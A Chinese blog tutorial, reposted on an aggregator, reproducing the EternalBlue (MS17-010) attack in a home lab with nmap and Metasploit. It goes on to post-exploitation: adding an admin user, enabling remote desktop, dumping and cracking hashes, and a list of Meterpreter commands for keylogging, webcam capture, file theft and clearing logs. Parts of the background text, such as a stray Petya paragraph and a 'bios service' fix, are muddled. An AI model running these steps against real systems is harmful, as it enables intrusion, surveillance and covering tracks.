永恒之蓝(ms17-010)简介与复现

这篇具有很好参考价值的文章主要介绍了永恒之蓝(ms17-010)简介与复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、永恒之蓝的介绍

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二、漏洞描述

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。

本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。

三、MSF介绍

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了,此工具在kali中是自带的。

四、漏洞复现

  1. 复现环境

win7(192.168.8.146)(实验前将防火墙彻底关闭

win10(192.168.8.8)后续攻击使用

kali(192.168.8.145)

  1. 先使用nmap对目标机进行扫描,查看其445端口是否开启

永恒之蓝(ms17-010)简介与复现
  1. 在终端输入msfconsole进入MSF

永恒之蓝(ms17-010)简介与复现
  1. 使用msf中的查找命令搜索关于永恒之蓝的脚本:search ms17—010

其中:auxiliary为辅助模块脚本;exploit为攻击模块脚本。

永恒之蓝(ms17-010)简介与复现
  1. 使用ms17-010辅助模块

  • 使用模块 use 粘贴模块

永恒之蓝(ms17-010)简介与复现
  1. 配置ms17-010的辅助性脚本

  • 查看配置:show options

永恒之蓝(ms17-010)简介与复现
  1. 配置目标机IP地址:set RHOST +目标机ip

永恒之蓝(ms17-010)简介与复现
  1. 配置成功后,执行ms17-010的辅助性脚本run #运行模块

永恒之蓝(ms17-010)简介与复现
  1. 使用ms17-010攻击模块

  • 使用模块 use 粘贴模块

永恒之蓝(ms17-010)简介与复现
  1. 查看配置项

  • 查看配置:show options

永恒之蓝(ms17-010)简介与复现
  1. 设置被攻击机的ip地址:set RHOST +目标机ip

永恒之蓝(ms17-010)简介与复现
  1. 运行ms17-010攻击模块

永恒之蓝(ms17-010)简介与复现
  1. 成功建立会话后,使用一些功能shell

永恒之蓝(ms17-010)简介与复现
  • 在此处可对目标机使用dos命令进行操作

  • 使用exit可退出win7终端

  1. 入侵成功后

  • 开启远程终端:需要双终端操作

在shell中,新建一个用户,将其加入管理员组

永恒之蓝(ms17-010)简介与复现
永恒之蓝(ms17-010)简介与复现
  • 在meterpreter下使用run getgui -e,试目标机打开允许被远程连接

永恒之蓝(ms17-010)简介与复现
永恒之蓝(ms17-010)简介与复现
  • 用win10进行远控

永恒之蓝(ms17-010)简介与复现
永恒之蓝(ms17-010)简介与复现
  • 在meterpreter下进行进一步实验

  • 查看靶机相关进程信息:ps

永恒之蓝(ms17-010)简介与复现
  • 查看靶机相关信息:sysinfo

永恒之蓝(ms17-010)简介与复现
  • 截图:screenshot

永恒之蓝(ms17-010)简介与复现
  • 获取靶机hash,破解密码:hashdump

输入hashdump

永恒之蓝(ms17-010)简介与复现

寻找一个在线MD5解密网站进行解密

永恒之蓝(ms17-010)简介与复现
  • 还有很多其他的操作这里就不一一演示了

run scraper #查看目标主机详细信息

load kiwi    #加载

pwd    #查看目标当前目录(windows)

getlwd   #查看目标当前目录(Linux)

search -f *.jsp -d e:\        #搜索E盘中所有以.jsp为后缀的文件

download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下

upload /root/test.txt d:\test   #将/root/test.txt上传到目标机的 d:\test\ 目录下

getpid    #查看当前Meterpreter Shell的进程

idletime  #查看主机运行时间

getuid    #查看获取的当前权限

screenshot #截图

webcam_list #查看目标主机的摄像头

webcam_snap #拍照

webcam_stream                #开视频

execute 参数 -f 可执行文件 #执行可执行程序

run getgui -e          #开启远程桌面

keyscan_start          #开启键盘记录功能

keyscan_dump        #显示捕捉到的键盘记录信息

keyscan_stop         #停止键盘记录功能

uictl disable keyboard     #禁止目标使用键盘

uictl enable keyboard     #允许目标使用键盘

uictl disable mouse       #禁止目标使用鼠标

uictl enable mouse     #允许目标使用鼠标

clearev            #清除日志

  • 修复方法

1.关闭bios服务,或开启防火墙,屏蔽服务端口

2.给系统打上永恒之蓝的漏洞修复补丁文章来源地址https://www.toymoban.com/news/detail-498923.html

到了这里,关于永恒之蓝(ms17-010)简介与复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(53)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(41)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(39)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(46)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(37)
  • MS17-010永恒之蓝漏洞复现(手把手教程,超细!)

    0x00-声明:小白一枚,写下来为了记录和学习交流,大神不喜勿喷。 0x01-思路:网段扫描—获取IP—漏洞扫描—发现存在漏洞—攻击拿shell—提权 目录 一、环境搭建                 01 所需软件:  二、开始操作  01 kali 开始网段扫描 02 漏洞利用 03 提权 04 利用管理员用

    2023年04月09日
    浏览(77)
  • 永恒之蓝漏洞 ms17_010 详解

    永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企

    2024年02月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包